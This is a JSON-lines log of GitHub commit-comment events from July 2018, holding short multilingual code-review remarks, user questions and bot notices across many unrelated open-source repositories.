{"id":"7933686064","type":"CommitCommentEvent","actor":{"login":"kingbbode"},"repo":{"name":"10duck/coduck-project"},"payload":{"comment":{"id":29632849,"position":14,"line":14,"path":"coduck-batch/src/main/java/com/coduck/season/step/writer/SeasonWriter.java","commit_id":"feb1b3923ac6449e23e276c4835f98675ab4bd3d","created_at":"2018-07-08T09:52:33Z","updated_at":"2018-07-08T09:52:33Z","author_association":"CONTRIBUTOR","body":"Component 방식을 쓰지말고\r\n각 Job이나 Step에서 어떤 방식으로 쓸지 정의할 수 있도록 Bean 방식으로 하는게 좋을 것 같아요.\r\n쓰는 곳마다 전역, Job, Step 스코프를 써야할 경우가 있을 수도 있어요.\r\n그래서 쓰는 곳에서 스코프를 정의할 수 있도록 하는게 좋은 것 같네요."}},"created_at":"2018-07-08T09:52:33Z"}
{"id":"7933687629","type":"CommitCommentEvent","actor":{"login":"jlitz"},"repo":{"name":"iamadamdev/bypass-paywalls-firefox"},"payload":{"comment":{"id":29632855,"position":null,"line":null,"path":null,"commit_id":"d66bc0bbc4946f14a9dda15de3c65241bff1513d","created_at":"2018-07-08T09:54:04Z","updated_at":"2018-07-08T09:54:04Z","author_association":"NONE","body":"removed and reinstalled worked tnx"}},"created_at":"2018-07-08T09:54:04Z"}
{"id":"7933687925","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29632857,"position":null,"line":null,"path":null,"commit_id":"4e9811f74d640ebc2e0fbd4689416947a459d11e","created_at":"2018-07-08T09:54:18Z","updated_at":"2018-07-08T09:54:18Z","author_association":"NONE","body":"про твой вопрос в Тичбейзе о том как же правильно валидировать, где и сколько )))\r\n\r\nты рассуждаешь логично, что по сути валидация в `initialize` и валидация в методе `add_wagon` должна быть идентичная, т.к. и там и там происходит одно и тоже - добавляется объект класса Стейшен в аттрибут объекта класса Роут\r\n\r\nкомментарии про рейзы с нашей стороны они вызваны скорее нашей обеспокоенностью неким нарушением структуры и даже нарушением \"принципа разделения обязанностей\"\r\nполучается, что у тебя методы через один занимаются валидацией... \r\nименно с этой точки зрения, чтобы избавиться от валидаций, которые заполонили класс, Влад тебе и посоветовал валидации убрать, потому что у тебя все равно из интерфейса приходит \"правильный объект\"\r\n\r\nэто скорее было предложение, стремящееся с одной стороны исправить явную ошибку, а валидации в каждом методе нарушают разграничение функций, что нехорошо, с другой стороны не прегружать твое решение на данном этапе\r\n\r\nоднако, если подходить более строго, то ты прав и валидации нужны, но...  правильно их будет писать не в методах, как я уже упомянул\r\n\r\nи если пойти этим путем, то проект сильно усложнится... вот собственно из-за этих противоречий и возникла эта нестыковочка в наших рекомендациях\r\n"}},"created_at":"2018-07-08T09:54:18Z"}
{"id":"7933688782","type":"CommitCommentEvent","actor":{"login":"keita-lib"},"repo":{"name":"keita-lib/univcam"},"payload":{"comment":{"id":29632861,"position":null,"line":null,"path":null,"commit_id":"3cbcbd62c76ac1dde30446a7b712ca236cdcd712","created_at":"2018-07-08T09:55:06Z","updated_at":"2018-07-08T09:55:06Z","author_association":"OWNER","body":"I made this with my whole heart.\r\n\r\nThis code generates the universal cam curve from cam parameters.\r\nI hope this code help your mechanical design calcuration.\r\n\r\nI am happy to make this code advance by your help. \r\n\r\nthank you.\r\n"}},"created_at":"2018-07-08T09:55:06Z"}
{"id":"7933690920","type":"CommitCommentEvent","actor":{"login":"ChetanMudgal"},"repo":{"name":"ChetanMudgal/ChetanMudgal.github.io"},"payload":{"comment":{"id":29632864,"position":null,"line":null,"path":null,"commit_id":"f72f8ba7889ce5c9350105cda06b75c886fbb524","created_at":"2018-07-08T09:56:54Z","updated_at":"2018-07-08T09:56:54Z","author_association":"OWNER","body":"To learn to use github"}},"created_at":"2018-07-08T09:56:54Z"}
{"id":"7933693102","type":"CommitCommentEvent","actor":{"login":"kingbbode"},"repo":{"name":"10duck/coduck-project"},"payload":{"comment":{"id":29632869,"position":26,"line":26,"path":"coduck-batch/src/main/java/com/coduck/season/step/reader/SeasonReader.java","commit_id":"feb1b3923ac6449e23e276c4835f98675ab4bd3d","created_at":"2018-07-08T09:59:03Z","updated_at":"2018-07-08T09:59:03Z","author_association":"CONTRIBUTOR","body":"Reader 에서 고려해야 할 사항은 중 \"일정한 순서를 보장하는가\"를 생각해보세요.\r\n\r\nfindGithubActivitiesBySeason으로 사용자를 조회했을 때 사용자가 일정한 순서를 보장할까요?\r\n신규 유입되거나 중간에 이탈하거나 등등의 이유로 순서가 보장되지 않을 수 있어요.\r\n\r\n잡이 중간이 정지했을 때 다시 원하는 시점부터 다시 시작할 수 있어야 해요. 그렇기 위해서 일정한 순서를 보장할 수 있는\r\n기준 값이 있어야하고, 그 기준 값을 기준으로 그 다음 시점부터 실행할 수 있어야 해요.\r\nex) kingbbode, nekisse, yonee 란 유저가 있을 때 nekisse란 유저까지 성공했고 yonee에서 실패.\r\n그런 중간에 junghoon이란 유저가 들어와서 findGithubActivitiesBySeason 의 순서가 kingbbode, junghoon, nekisse, yonee 로 변경되었을 때 어떻게 성공한 사람을 제외하고 다음 순서부터 실행할 수 있을까?\r\n(이미 성공했는지 체크하는 방식은 조회를 더 하게 되므로 안쓰는게 좋구요.)\r\n\r\n순서를 보장할 수 있는 방식을 잘 고려해보세요."}},"created_at":"2018-07-08T09:59:03Z"}
{"id":"7933693533","type":"CommitCommentEvent","actor":{"login":"elupus"},"repo":{"name":"home-assistant/home-assistant"},"payload":{"comment":{"id":29632870,"position":null,"line":null,"path":null,"commit_id":"34392db9e4eadb3ae31e5c7ca3542cb0291a02ad","created_at":"2018-07-08T09:59:28Z","updated_at":"2018-07-08T09:59:28Z","author_association":"CONTRIBUTOR","body":"Ok , just seemed odd to push a future branch to core repo instead of personal with pull request. Normally you'd only do this if it was expected to be long lived and available to others. Looked more like an oversight."}},"created_at":"2018-07-08T09:59:28Z"}
{"id":"7933693770","type":"CommitCommentEvent","actor":{"login":"janpecha"},"repo":{"name":"Tharos/LeanMapper"},"payload":{"comment":{"id":29632871,"position":11,"line":86,"path":"src/LeanMapper/Fluent.php","commit_id":"0252cd5198fcdda216513faa08d23e99b2f91ab3","created_at":"2018-07-08T09:59:42Z","updated_at":"2018-07-08T09:59:42Z","author_association":"COLLABORATOR","body":"@castamir ahoj, nepamatuješ si jaký byl důvod k této změně? Protože podle všeho by mělo obyčejné `parent::_export()` stačit."}},"created_at":"2018-07-08T09:59:42Z"}
{"id":"7933693997","type":"CommitCommentEvent","actor":{"login":"kondsXin"},"repo":{"name":"koolwiki/goflyway_android"},"payload":{"comment":{"id":29632872,"position":null,"line":null,"path":null,"commit_id":"22d065fade22dbccadd17413c2871ad28dca22ba","created_at":"2018-07-08T09:59:56Z","updated_at":"2018-07-08T09:59:56Z","author_association":"NONE","body":"非常感谢,我今天测试了一下,虽然未能成功.但是还是对您的贡献表示深深的感谢!!!!\r\n测试中的一些疑问请教您一下。 \r\n首先，goflyway的安卓客户端可以正常运行的。提示信息如下\r\n![gf-c](https://user-images.githubusercontent.com/30715757/42418546-61a8b094-82d5-11e8-9ae0-0f5a3d2b2252.png)\r\n配合从google市场下载的Postern-3.1.2 \r\n![screenshot_2018-07-08-17-21-25](https://user-images.githubusercontent.com/30715757/42418585-15caef10-82d6-11e8-9b55-9fb4de75aa0b.png)\r\n代理类型我5个选项逐一试过，都未能成功。是我哪里设置错误了吗？"}},"created_at":"2018-07-08T09:59:56Z"}
{"id":"7934821836","type":"CommitCommentEvent","actor":{"login":"aariacarterweir"},"repo":{"name":"mysql/mysql-server"},"payload":{"comment":{"id":29635465,"position":null,"line":null,"path":null,"commit_id":"43a506c0ced0e6ea101d3ab8b4b423ce3fa327d0","created_at":"2018-07-09T00:01:35Z","updated_at":"2018-07-09T00:01:35Z","author_association":"NONE","body":"hahahahhahahaha what a giant fail"}},"created_at":"2018-07-09T00:01:35Z"}
{"id":"7934830404","type":"CommitCommentEvent","actor":{"login":"oneal1801"},"repo":{"name":"RicardoBritoBrens/HistoryOfScienceFiction"},"payload":{"comment":{"id":29635477,"position":83,"line":45,"path":"Draff_CarlosQuien.txt","commit_id":"6bd21d66b3e3d109e53804a0ab66fb041ded30a1","created_at":"2018-07-09T00:07:27Z","updated_at":"2018-07-09T00:07:27Z","author_association":"NONE","body":"klk"}},"created_at":"2018-07-09T00:07:27Z"}
{"id":"7934833524","type":"CommitCommentEvent","actor":{"login":"hnes"},"repo":{"name":"hnes/libaco"},"payload":{"comment":{"id":29635484,"position":18,"line":37,"path":"aco.h","commit_id":"0a33bdd2d786c7ec6b7cc85dfe777326762db5ae","created_at":"2018-07-09T00:09:56Z","updated_at":"2018-07-09T00:09:56Z","author_association":"OWNER","body":"> I guess that this simple change will matter for C++ applications, won\\'t it?\r\n\r\nThis change did only matter for C++ applications.\r\n\r\n>It seems that you will struggle with the appropriate selection of version numbers.\r\n>Are you aware of the possibility with combining some changes at once from development branches (by “octopus merges”)?\r\n\r\nYes, but only a bit for me. I have created a specification of release procedure. Every time I would check the spec before publishing a new release. Maybe I would choose to use a dev branch in the future, but not right now (since it\\'s a little trivial, at least for now. There are many more important targets.)"}},"created_at":"2018-07-09T00:09:56Z"}
{"id":"7934834738","type":"CommitCommentEvent","actor":{"login":"vaibhavp12345"},"repo":{"name":"DaBozzz/android_device_zuk_ham"},"payload":{"comment":{"id":29635486,"position":null,"line":null,"path":null,"commit_id":"81522287f606e77638562730444cd8c9b4d4b8dc","created_at":"2018-07-09T00:10:47Z","updated_at":"2018-07-09T00:10:47Z","author_association":"NONE","body":"Hello sir, please tell me how to add a switch for enabling/disabling U-Touch?"}},"created_at":"2018-07-09T00:10:47Z"}
{"id":"7934835755","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29635489,"position":null,"line":null,"path":null,"commit_id":"1722e54d4837a30b9f362fbd7388634ff6376340","created_at":"2018-07-09T00:11:32Z","updated_at":"2018-07-09T00:11:32Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [improve potential matches](https://trello.com/c/NpGEtW9X/23-improve-potential-matches)"}},"created_at":"2018-07-09T00:11:32Z"}
{"id":"7934835995","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29635490,"position":null,"line":null,"path":null,"commit_id":"209376e8c6a994ff6154a49423c92473af052703","created_at":"2018-07-09T00:11:44Z","updated_at":"2018-07-09T00:11:44Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [improve potential matches](https://trello.com/c/NpGEtW9X/23-improve-potential-matches)"}},"created_at":"2018-07-09T00:11:44Z"}
{"id":"7934843346","type":"CommitCommentEvent","actor":{"login":"nschneid"},"repo":{"name":"nert-gu/Xposition"},"payload":{"comment":{"id":29635507,"position":58,"line":305,"path":"scripts/tex2markdown.py","commit_id":"c4acea9b87f5fe55deb367c274176299138069c6","created_at":"2018-07-09T00:17:04Z","updated_at":"2018-07-09T00:17:04Z","author_association":"CONTRIBUTOR","body":"If this is for LaTeX `\\\\` line breaks, I think it should be replaced with `\" \"`."}},"created_at":"2018-07-09T00:17:04Z"}
{"id":"7934845140","type":"CommitCommentEvent","actor":{"login":"nschneid"},"repo":{"name":"nert-gu/Xposition"},"payload":{"comment":{"id":29635511,"position":59,"line":306,"path":"scripts/tex2markdown.py","commit_id":"c4acea9b87f5fe55deb367c274176299138069c6","created_at":"2018-07-09T00:18:29Z","updated_at":"2018-07-09T00:18:29Z","author_association":"CONTRIBUTOR","body":"Do you mean `\"\\\\ \"` a.k.a. `r\"\\ \"`? Don't want to remove backslashes used for macros."}},"created_at":"2018-07-09T00:18:29Z"}
{"id":"7934845573","type":"CommitCommentEvent","actor":{"login":"Grazfather"},"repo":{"name":"hugsy/gef"},"payload":{"comment":{"id":29635512,"position":5,"line":4475,"path":"gef.py","commit_id":"59143c94b3afbfe9a01c6f4b9c445f4b806f475e","created_at":"2018-07-09T00:18:49Z","updated_at":"2018-07-09T00:18:49Z","author_association":"COLLABORATOR","body":"Yeah will do host:port"}},"created_at":"2018-07-09T00:18:49Z"}
{"id":"7934847364","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29635518,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-09T00:20:09Z","updated_at":"2018-07-09T00:20:09Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T00:20:09Z"}
{"id":"7934849588","type":"CommitCommentEvent","actor":{"login":"Kathryn17miranda"},"repo":{"name":"Kathryn17miranda/00d1-4ef5-82ba-b9d5eb0d93c1"},"payload":{"comment":{"id":29635521,"position":null,"line":null,"path":null,"commit_id":"fc1b797da033e3f8faefd9ce7a801862bb0c4235","created_at":"2018-07-09T00:21:47Z","updated_at":"2018-07-09T00:21:47Z","author_association":"OWNER","body":"\r\n+# 00d1-4ef5-82ba-b9d5eb0d93c1"}},"created_at":"2018-07-09T00:21:47Z"}
{"id":"7934849775","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29635522,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-09T00:21:55Z","updated_at":"2018-07-09T00:21:55Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T00:21:55Z"}
{"id":"7934859501","type":"CommitCommentEvent","actor":{"login":"nschneid"},"repo":{"name":"nert-gu/Xposition"},"payload":{"comment":{"id":29635536,"position":33,"line":128,"path":"scripts/tex2markdown.py","commit_id":"c4acea9b87f5fe55deb367c274176299138069c6","created_at":"2018-07-09T00:29:11Z","updated_at":"2018-07-09T00:29:11Z","author_association":"CONTRIBUTOR","body":"I think the bold tags can be dropped."}},"created_at":"2018-07-09T00:29:11Z"}
{"id":"7934865170","type":"CommitCommentEvent","actor":{"login":"raysan5"},"repo":{"name":"raysan5/raylib"},"payload":{"comment":{"id":29635544,"position":null,"line":null,"path":null,"commit_id":"b588af5ce22691bb143dcd784858e3c331c4a1e6","created_at":"2018-07-09T00:33:07Z","updated_at":"2018-07-09T00:33:07Z","author_association":"OWNER","body":"I've never used the git submodules... does it allow to keep a copy of GLFW in the external folder like now? and keep syncing that submodule with main project when required?\r\n\r\nI'd prefer not to add changes to default GLFW implementation..."}},"created_at":"2018-07-09T00:33:07Z"}
{"id":"7934866837","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/CRM"},"payload":{"comment":{"id":29635545,"position":8,"line":336,"path":"src/main/java/com/ewp/crm/service/impl/VKService.java","commit_id":"da08131d1005132c25ceca27302c8f6dc04aca28","created_at":"2018-07-09T00:34:23Z","updated_at":"2018-07-09T00:34:23Z","author_association":"NONE","body":"hardcode?"}},"created_at":"2018-07-09T00:34:23Z"}
{"id":"7934876013","type":"CommitCommentEvent","actor":{"login":"a3f"},"repo":{"name":"raysan5/raylib"},"payload":{"comment":{"id":29635568,"position":null,"line":null,"path":null,"commit_id":"b588af5ce22691bb143dcd784858e3c331c4a1e6","created_at":"2018-07-09T00:40:47Z","updated_at":"2018-07-09T00:40:47Z","author_association":"COLLABORATOR","body":"> does it allow to keep a copy of GLFW in the external folder like now\r\n\r\nYes, but running any git commands while in the glfw folder would affect the dedicated glfw repository, not the main raylib repository. The file defining this could look like this:\r\n\r\n```\r\n[submodule \"glfw\"]\r\n\tpath = src/external/glfw\r\n\turl = https://github.com/raysan5/glfw.git\r\n```\r\n\r\n> keep syncing that submodule with main project when required?\r\n\r\nYe, you can choose what commit the submodule points at.\r\n\r\n> I'd prefer not to add changes to default GLFW implementation...\r\n\r\nAh, ok. Then there is no need for the submodule. I'd prefer it that way too, but there's no portable way to include one static library (`libglfw.a`) into another (`libraylib.a`), that's why I did these CMake changes.\r\n\r\nNot sure if upstream is interested in supporting this use case..."}},"created_at":"2018-07-09T00:40:47Z"}
{"id":"7934880010","type":"CommitCommentEvent","actor":{"login":"YuZiHanorz"},"repo":{"name":"YuZiHanorz/MIPS-Simulator"},"payload":{"comment":{"id":29635574,"position":null,"line":null,"path":null,"commit_id":"dd8ef8ca0292cf3318bbf64f27f5cf1d9e2ba756","created_at":"2018-07-09T00:43:27Z","updated_at":"2018-07-09T00:43:27Z","author_association":"OWNER","body":"a substitution to pipeline.h in old version"}},"created_at":"2018-07-09T00:43:27Z"}
{"id":"7934882861","type":"CommitCommentEvent","actor":{"login":"Ron-Chang"},"repo":{"name":"Ron-Chang/Video_Tutorial"},"payload":{"comment":{"id":29635581,"position":null,"line":null,"path":null,"commit_id":"6f1b83644012a21aa7744c3980b3e0bd62ad9596","created_at":"2018-07-09T00:45:30Z","updated_at":"2018-07-09T00:45:30Z","author_association":"OWNER","body":"Input an integer number:\r\n>>> 10\r\n[1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\r\n3628800\r\nInput an integer number:\r\n>>> 10\r\n3628800\r\nInput an interger number:\r\n>>> 10\r\n3628800"}},"created_at":"2018-07-09T00:45:30Z"}
{"id":"7934885329","type":"CommitCommentEvent","actor":{"login":"Ron-Chang"},"repo":{"name":"Ron-Chang/Video_Tutorial"},"payload":{"comment":{"id":29635583,"position":null,"line":null,"path":null,"commit_id":"6f1b83644012a21aa7744c3980b3e0bd62ad9596","created_at":"2018-07-09T00:47:11Z","updated_at":"2018-07-09T00:47:11Z","author_association":"OWNER","body":"Input an integer number: 10\r\n[1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\r\n3628800\r\n\r\nInput an integer number: 10\r\n3628800\r\n\r\nInput an interger number: 10\r\n3628800"}},"created_at":"2018-07-09T00:47:11Z"}
{"id":"7934891836","type":"CommitCommentEvent","actor":{"login":"jeffreybaoshenlee"},"repo":{"name":"brianrhall/Assembly"},"payload":{"comment":{"id":29635595,"position":11,"line":11,"path":"Chapter_10_Code/Example 10.3/Example_10.3.cpp","commit_id":"d2b38e80ee2e166e0e00ce382b5dd1d0cbcecde6","created_at":"2018-07-09T00:51:26Z","updated_at":"2018-07-09T00:51:26Z","author_association":"NONE","body":"I think it should be `denominator == 0` ."}},"created_at":"2018-07-09T00:51:26Z"}
{"id":"7934892857","type":"CommitCommentEvent","actor":{"login":"Tribal1012"},"repo":{"name":"Tribal1012/mipsHex"},"payload":{"comment":{"id":29635599,"position":55,"line":91,"path":"mipsHex/asm_type/mips_asm_bits.py","commit_id":"77d2316ef9837c54895e86fbed4d0db84e9b5859","created_at":"2018-07-09T00:52:07Z","updated_at":"2018-07-09T00:52:07Z","author_association":"OWNER","body":"Why only check the 'General_Register' type in do_andi method?"}},"created_at":"2018-07-09T00:52:07Z"}
{"id":"7934894657","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29635604,"position":15,"line":15,"path":"contracts/Ownable.sol","commit_id":"818ea30a9e61ca05ea6c9d9330877985c0fdb171","created_at":"2018-07-09T00:53:18Z","updated_at":"2018-07-09T00:53:18Z","author_association":"NONE","body":"You could go nuts and do `function changeAdmin(address newAdmin) public onlyAdmin returns(bool success) { ...`\r\n\r\nDon't forget to emit an event ;-)"}},"created_at":"2018-07-09T00:53:18Z"}
{"id":"7934897129","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29635612,"position":9,"line":9,"path":"contracts/Pausable.sol","commit_id":"818ea30a9e61ca05ea6c9d9330877985c0fdb171","created_at":"2018-07-09T00:55:03Z","updated_at":"2018-07-09T00:55:03Z","author_association":"NONE","body":"To help it be auditable, you could add `msg.sender`. That's my default habit (better safe than sorry) although I recognize it couldn't possibly be anyone else when `onlyAdmin` guards the function. "}},"created_at":"2018-07-09T00:55:03Z"}
{"id":"7934898601","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29635613,"position":5,"line":4,"path":"contracts/Splitter.sol","commit_id":"818ea30a9e61ca05ea6c9d9330877985c0fdb171","created_at":"2018-07-09T00:56:00Z","updated_at":"2018-07-09T00:56:00Z","author_association":"NONE","body":"Good. It's important to realize that `Splitter is Ownable` by inference and not repeat it explicitly. "}},"created_at":"2018-07-09T00:56:00Z"}
{"id":"7934900614","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29635616,"position":63,"line":38,"path":"contracts/Splitter.sol","commit_id":"818ea30a9e61ca05ea6c9d9330877985c0fdb171","created_at":"2018-07-09T00:57:19Z","updated_at":"2018-07-09T00:57:19Z","author_association":"NONE","body":"Treat the event emitters as a state change and put in front of the transfer. Events will be reverted with everything else if the transfer fails. There are some good reasons for sticking to the re-entrance defense pattern. "}},"created_at":"2018-07-09T00:57:19Z"}
{"id":"7934902223","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29635618,"position":null,"line":null,"path":null,"commit_id":"3fe15a89dd75d4acc0468048a28178654c6cb7e1","created_at":"2018-07-09T00:58:19Z","updated_at":"2018-07-09T00:58:19Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Системы: сделать систему для сборки объектов на основе ScriptableObject.](https://trello.com/c/9c2ZE4cO/46-%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D1%8B-%D1%81%D0%B4%D0%B5%D0%BB%D0%B0%D1%82%D1%8C-%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D1%83-%D0%B4%D0%BB%D1%8F-%D1%81%D0%B1%D0%BE%D1%80%D0%BA%D0%B8-%D0%BE%D0%B1%D1%8A%D0%B5%D0%BA%D1%82%D0%BE%D0%B2-%D0%BD%D0%B0-%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D0%B5-scriptableobject)"}},"created_at":"2018-07-09T00:58:19Z"}
{"id":"7934902349","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/whichcraft-feedstock"},"payload":{"comment":{"id":29635619,"position":null,"line":null,"path":null,"commit_id":"27afb2b0d6e669f855678616a1209f64f8f28651","created_at":"2018-07-09T00:58:24Z","updated_at":"2018-07-09T00:58:24Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @pydanny were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @pydanny were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-09T00:58:24Z"}
{"id":"7934907698","type":"CommitCommentEvent","actor":{"login":"psychodelicwasabi"},"repo":{"name":"wareya/nazeka"},"payload":{"comment":{"id":29635632,"position":null,"line":null,"path":null,"commit_id":"dc6157020fef416c6055e3e89186da950d096c12","created_at":"2018-07-09T01:01:32Z","updated_at":"2018-07-09T01:01:32Z","author_association":"NONE","body":"When will it be usable on the addon, or how can I (along with my dumb brain) try it out?"}},"created_at":"2018-07-09T01:01:32Z"}
{"id":"7934909415","type":"CommitCommentEvent","actor":{"login":"wareya"},"repo":{"name":"wareya/nazeka"},"payload":{"comment":{"id":29635635,"position":null,"line":null,"path":null,"commit_id":"dc6157020fef416c6055e3e89186da950d096c12","created_at":"2018-07-09T01:02:35Z","updated_at":"2018-07-09T01:02:35Z","author_association":"OWNER","body":"I upload new versions to the addon site once I've tested them on myself for long enough to know they're not broken. This usually takes a few days."}},"created_at":"2018-07-09T01:02:35Z"}
{"id":"7934910638","type":"CommitCommentEvent","actor":{"login":"raysan5"},"repo":{"name":"raysan5/raylib"},"payload":{"comment":{"id":29635636,"position":null,"line":null,"path":null,"commit_id":"b588af5ce22691bb143dcd784858e3c331c4a1e6","created_at":"2018-07-09T01:03:25Z","updated_at":"2018-07-09T01:03:25Z","author_association":"OWNER","body":" > Not sure if upstream is interested in supporting this use case...\r\n\r\nWell, it's a build situation... if not using CMake, I'm building it as single `rglfw.o` module... I think this usage could be useful for some users and I think is not against zlib license."}},"created_at":"2018-07-09T01:03:25Z"}
{"id":"7934916554","type":"CommitCommentEvent","actor":{"login":"Electry"},"repo":{"name":"CelesteBlue-dev/PSVita-StorageMgr"},"payload":{"comment":{"id":29635643,"position":null,"line":null,"path":null,"commit_id":"59fb2d1c126899fb6914f1c2a6935355902886b9","created_at":"2018-07-09T01:07:11Z","updated_at":"2018-07-09T01:07:11Z","author_association":"NONE","body":"I still don't like the messy nature of this plugin :P"}},"created_at":"2018-07-09T01:07:11Z"}
{"id":"7934917389","type":"CommitCommentEvent","actor":{"login":"cparrapa"},"repo":{"name":"stembotvn/OttoDIY_mBlock_Extension"},"payload":{"comment":{"id":29635644,"position":null,"line":null,"path":null,"commit_id":"383402b058d7f2dab62cbafc2dd68082a1563d14","created_at":"2018-07-09T01:07:45Z","updated_at":"2018-07-09T01:07:45Z","author_association":"CONTRIBUTOR","body":"isn't the same as the bluetooth now?"}},"created_at":"2018-07-09T01:07:45Z"}
{"id":"7934918342","type":"CommitCommentEvent","actor":{"login":"rui314"},"repo":{"name":"ushitora-anqou/aqcc"},"payload":{"comment":{"id":29635650,"position":1,"line":1,"path":"aqcc.h","commit_id":"463e7ce6b86596b72c398b463834f3901e8e5883","created_at":"2018-07-09T01:08:23Z","updated_at":"2018-07-09T01:08:23Z","author_association":"NONE","body":"pragma onceは非標準だから不要なら避けた方がよいかも。普通のやり方は若干冗長ですが\r\n\r\n  #ifndef foo\r\n  #define foo\r\n  ...\r\n  #endif\r\n\r\nですね。"}},"created_at":"2018-07-09T01:08:23Z"}
{"id":"7934919786","type":"CommitCommentEvent","actor":{"login":"CelesteBlue-dev"},"repo":{"name":"CelesteBlue-dev/PSVita-StorageMgr"},"payload":{"comment":{"id":29635654,"position":null,"line":null,"path":null,"commit_id":"59fb2d1c126899fb6914f1c2a6935355902886b9","created_at":"2018-07-09T01:09:14Z","updated_at":"2018-07-09T01:09:14Z","author_association":"OWNER","body":"messy like what ?"}},"created_at":"2018-07-09T01:09:14Z"}
{"id":"7934919822","type":"CommitCommentEvent","actor":{"login":"rui314"},"repo":{"name":"ushitora-anqou/aqcc"},"payload":{"comment":{"id":29635655,"position":15,"line":15,"path":"aqcc.h","commit_id":"463e7ce6b86596b72c398b463834f3901e8e5883","created_at":"2018-07-09T01:09:16Z","updated_at":"2018-07-09T01:09:16Z","author_association":"NONE","body":"これも大した問題ではないけどthisはC++のキーワードなので避けた方が無難（CはC++のサブセットのはずだけど、キーワードを使っているとC++ファイルとしてコンパイルできなくなる）。"}},"created_at":"2018-07-09T01:09:16Z"}
{"id":"7934920003","type":"CommitCommentEvent","actor":{"login":"itblaked"},"repo":{"name":"elastic/ansible-elasticsearch"},"payload":{"comment":{"id":29635656,"position":null,"line":null,"path":null,"commit_id":"cc28b6149af9866455f9b1b90ac601596e4635a4","created_at":"2018-07-09T01:09:24Z","updated_at":"2018-07-09T01:09:24Z","author_association":"NONE","body":"Ok thanks, I will test it out"}},"created_at":"2018-07-09T01:09:24Z"}
{"id":"7934923742","type":"CommitCommentEvent","actor":{"login":"ruck64"},"repo":{"name":"ruck64/Python"},"payload":{"comment":{"id":29635661,"position":null,"line":null,"path":null,"commit_id":"583e4a47c881fc19f022b643bcde9895966a8821","created_at":"2018-07-09T01:11:41Z","updated_at":"2018-07-09T01:11:41Z","author_association":"OWNER","body":"my own fizzbuzz version"}},"created_at":"2018-07-09T01:11:41Z"}
